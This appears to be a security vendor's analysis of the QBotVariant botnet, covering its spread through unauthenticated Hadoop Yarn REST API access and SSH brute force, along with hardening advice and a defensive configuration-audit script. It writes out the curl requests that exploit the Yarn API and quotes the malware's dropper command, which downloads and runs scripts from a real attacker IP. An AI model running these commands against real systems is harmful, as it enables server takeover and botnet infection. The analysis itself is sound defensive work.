The Internet brings convenience to people, but its openness also brings convenience to malicious users: more and more malicious program source code is published openly, lowering the difficulty of external attack and intrusion and making the security problem more serious.
The Alibaba Cloud security team monitored a BOT family in May this year whose samples were rewritten from source code openly available on the Internet and were spread widely, causing great harm. The cloud security team analyzed, clustered and traced this kind of sample, and named the family QBotVariant.
QBotVariant has DDoS attack, backdoor, downloader and brute-force cracking capabilities; once a host is compromised, it becomes a bot. The family mainly spreads through the unauthorized access vulnerability of the Hadoop Yarn resource management system REST API and through brute-force cracking based on weak passwords. Like Mirai, this BOT family targets multiple operating system versions: not only servers are compromised, but IoT devices such as CCTV monitoring and home routers are even more vulnerable to attack and intrusion. Radware's Pascal Geenens mentioned this type of sample in a recent blog post, New DemonBot Discovered, but the IP, sample and other information he found belong to only one sample in this family; we have discovered more than 30 download servers. QBotVariant's varied IPs and binary sample variants make it difficult to find and track.
On the cloud platform, the activity of QBotVariant we have detected is shown in the figure below: it reached thousands of events at the peak, and the activity has not decreased.
Below, we analyze QBotVariant in detail from multiple perspectives: propagation mode, script analysis, sample analysis and traceability.
Mode of intrusion and propagation
The QBotVariant family spreads in two ways: one is to exploit the unauthorized access vulnerability of the Hadoop Yarn resource management system REST API for intrusion; the other is SSH brute-force cracking using hard-coded weak passwords.
Hadoop is a distributed system framework developed by the Apache Foundation. It implements distributed processing using the MapReduce algorithm. Yarn is Hadoop's cluster resource management system. When the Hadoop Yarn resource management system is improperly configured, it allows unauthorized access and malicious use by attackers. An attacker can execute arbitrary code by deploying a task through the REST API without any authentication, ultimately taking full control of the server.
The problem is caused by the ports that the following configuration items enable:
yarn.resourcemanager.webapp.address, default port 8088
yarn.resourcemanager.webapp.https.address, default port 8090
First, apply for a new application with the following request:
curl -v -X POST 'http://ip:port/ws/v1/cluster/apps/new-application'
Then execute the following command to complete the intrusion:
curl -s -i -X POST -H 'Accept:application/json' -H 'Content-Type:application/json' http://ip:port/ws/v1/cluster/apps --data-binary @example.json
The example.json file is shown below
{
  "am-container-spec": {
    "commands": {
      "command": "Execute the command written here"
    }
  },
  "application-id": "application_xxxx_xxxxx",
  "application-name": "test",
  "application-type": "YARN"
}
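The exposure described above is a configuration problem, so a defender's first check is the cluster configuration itself. The following Python audit is an added example, not code from the write-up or from Alibaba Cloud; it parses a Hadoop XML configuration (constructed sample inline) and flags the two webapp address keys named above when they bind to all interfaces on the default ports, plus the standard Hadoop properties hadoop.security.authentication and hadoop.http.authentication.type (real properties, but not mentioned in the write-up) when they are left at "simple" rather than "kerberos".

```python
import xml.etree.ElementTree as ET

# Constructed sample of a misconfigured Hadoop config (yarn-site.xml and
# core-site.xml keys merged for illustration). Keys are real Hadoop
# properties; the values are made up to show the exposed case.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<configuration>
  <property><name>yarn.resourcemanager.webapp.address</name><value>0.0.0.0:8088</value></property>
  <property><name>yarn.resourcemanager.webapp.https.address</name><value>0.0.0.0:8090</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
  <property><name>hadoop.http.authentication.type</name><value>simple</value></property>
</configuration>
"""

DEFAULT_REST_PORTS = {"8088", "8090"}  # defaults named in the write-up
WEBAPP_KEYS = ("yarn.resourcemanager.webapp.address",
               "yarn.resourcemanager.webapp.https.address")


def parse_hadoop_config(xml_text):
    """Return {name: value} for every <property> in a Hadoop XML config file."""
    props = {}
    for prop in ET.fromstring(xml_text).iter("property"):
        name = prop.findtext("name")
        if name is not None:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit_yarn_exposure(props):
    """Return human-readable findings explaining why the RM REST API may be abusable."""
    findings = []
    for key in WEBAPP_KEYS:
        addr = props.get(key)
        if not addr:
            continue  # key absent: Hadoop falls back to its own default
        host, _, port = addr.rpartition(":")
        if host in ("", "0.0.0.0", "[::]"):
            findings.append(f"{key} binds to all interfaces ({addr})")
        if port in DEFAULT_REST_PORTS:
            findings.append(f"{key} uses default port {port}; verify it is not Internet-reachable")
    # Both properties default to "simple" when missing, i.e. no authentication.
    if props.get("hadoop.security.authentication", "simple") != "kerberos":
        findings.append("hadoop.security.authentication is not kerberos: any client reaching the RM can submit applications")
    if props.get("hadoop.http.authentication.type", "simple") != "kerberos":
        findings.append("hadoop.http.authentication.type is not kerberos: the REST API accepts unauthenticated requests")
    return findings
```

Running the audit over the real yarn-site.xml and core-site.xml of a cluster is the same call; an empty finding list means the three conditions the write-up's intrusion path relies on are not present.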
Script analysis
We traced back to the original version of QBotVariant, which supports wget, tftp, ftpget and other download methods; the scripts are downloaded from a remote download server and executed:
bash -c "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;
wget http://185.244.25.153/bins.sh; chmod 777 bins.sh; sh bins.sh;
tftp 185.244.25.153 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh;
tftp -r tftp2.sh -g 185.244.25.153; chmod 777 tftp2.sh; sh tftp2.sh;
ftpget -v -u anonymous -p anonymous -P 21 185.244.25.153 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh"
The following is a rewritten download script intercepted by Alibaba Cloud Security. It can be seen from the script that the author compiled different versions of the program, disguised under names such as ntpd, sshd and openssh, in order to support IoT devices well. In addition, busybox is prefixed to each command line, which makes this class of script work well on IoT devices and provides an easy way to distribute QBotVariant.
The source code captured by Alibaba Cloud contains scripts for compiling multiple versions.
The version types supported by QBotVariant and their corresponding binary names:
Supported version type    Corresponding binary name
mips                      ntpd
i586                      ftp
mipsel                    sshd
m68k                      pftp
sh4                       openssh
sparc                     sh
x86_64                    bash
armv4l
armv6l                    tftp
armv5l                    apache2
i686                      wget
powerpc-440fp             telnetd
powerpc                   cron
Sample analysis
Many batches of samples intercepted by Alibaba Cloud are relatively similar and are all adapted from QBot. Some authors may cut some functions in order to simplify the samples or to counter anti-virus software. We randomly compared two captured samples: the sample on the right of the figure removes the getRandomPublicIP function and implements only a few of QBot's functions, with a smaller file and fewer capabilities.
However, most of the samples implement the basic functions, and their propagation and harmfulness are unchanged. Some of the functions are shown in the figure.
Command analysis
We analyzed the remote control commands; their functions are shown in the figure below.
It is worth paying attention to the StartTheLelz function, which is mainly used for brute-forcing randomly generated IP addresses. As shown in the figure, a random IP is obtained through the getRandomPublicIP function, hard-coded user names and passwords are stored in a structure, and a connection is then attempted. The maximum number of brute-force attempts is controlled by the Max variable, which is related to the number of entries in the file descriptor table but cannot exceed 4096.
From the data area, we can see that the author has built in several common user names and passwords for brute forcing.
If the brute force succeeds, the following script is executed on the compromised host to infect it and continue spreading.
In addition to the common DDoS attack methods, QBotVariant can also send junk data through sendJUNK or sendUDP. As shown in the makeRandomStr function that generates random strings, sending a large number of garbage packets can also cause network bandwidth congestion.
In order to maximize the value of an intrusion, QBotVariant also provides a remote shell command execution function: commands starting with "SH" are executed and the results are returned to the remote controller through fdgets and sockprintf, as follows.
Sample traceability/homology analysis
During sample analysis we found an interesting phenomenon: in order to avoid detection, the samples use different check-in messages when they first report to the controller, so we selected several QBotVariant check-in formats.
The first type of message is simple and returns endianness, CPU architecture, host purpose and so on.
The second type of message is comprehensive, including the operating system, CPU architecture, host purpose, port, host IP address and so on.
The third type of message is the simplest and returns only architecture information.
The fourth returns endianness and architecture information.
The fifth is more comprehensive, including architecture information, endianness, host IP, host purpose and other information.
The sixth returns the host IP address, type and version information.
The seventh returns architecture, host IP and other information.
When tracing the samples, we found a large number of source code and binary files of such samples on Pastebin, which had existed for several months, and the author's directory also included other IoT worms. At the same time, we found that several authors had made changes to QBot, as shown in the Pastebin and GitHub pages of one of the authors.
QBot seems little known domestically, but because its source code is simple and small and supports a variety of architectures, the client has remained active since 2009 and is often used as a remote control client, for example for DDoS. Most of the IPs we intercepted are in North America and Europe, but the cloud platform has also detected attacks from domestic source IPs, so domestic security personnel should take it seriously.
Security hardening
● Cloud firewall
Enable the IPS interception mode and virtual patch function of the cloud firewall. The cloud firewall already supports defense against this vulnerability and against brute-force cracking, so users remain protected even if they cannot patch in time.
● Network access control
Use ECS/VPC security group to control the access source IP address of the affected service port. If the Hadoop environment provides services only for the Intranet, do not publish the Hadoop service port to the Internet.
● Update and Upgrade
If you use self-built Hadoop, apply patches in a timely manner based on actual conditions. Hadoop 2.X and later versions provide security authentication and add the Kerberos authentication mechanism; it is recommended to enable Kerberos authentication. Alternatively, you can choose MaxCompute (over 8 years of "zero" security vulnerabilities) or E-MapReduce services on the cloud.
Safety recommendations
● The cloud firewall supports defense against attacks against this vulnerability. You are advised to purchase a cloud firewall and enable detection.
● Through the Security Butler service, carry out security reinforcement and optimization under the guidance of Alibaba Cloud security experts, so that the system is not affected by vulnerabilities.
Conclusion
QBotVariant uses the unauthorized access vulnerability of the Hadoop Yarn resource management system REST API and weak-password brute forcing to penetrate hosts. Once a host is infected with this worm, it not only occupies computing resources and consumes bandwidth and traffic, but can also lead to data leakage and data loss.
Alibaba Cloud Security reminds Internet users to pay attention to the configuration of third-party applications to prevent such unauthorized access vulnerabilities, and to strengthen their awareness of user name and password security in order to protect their assets effectively.
IOC
Partial list of MD5 hashes and file names, grouped by download server
Partial list of download server IPs
Partial list of download URLs and the dates they were observed
This article is original content of the Alibaba Cloud Yunqi Community and may not be reproduced without permission.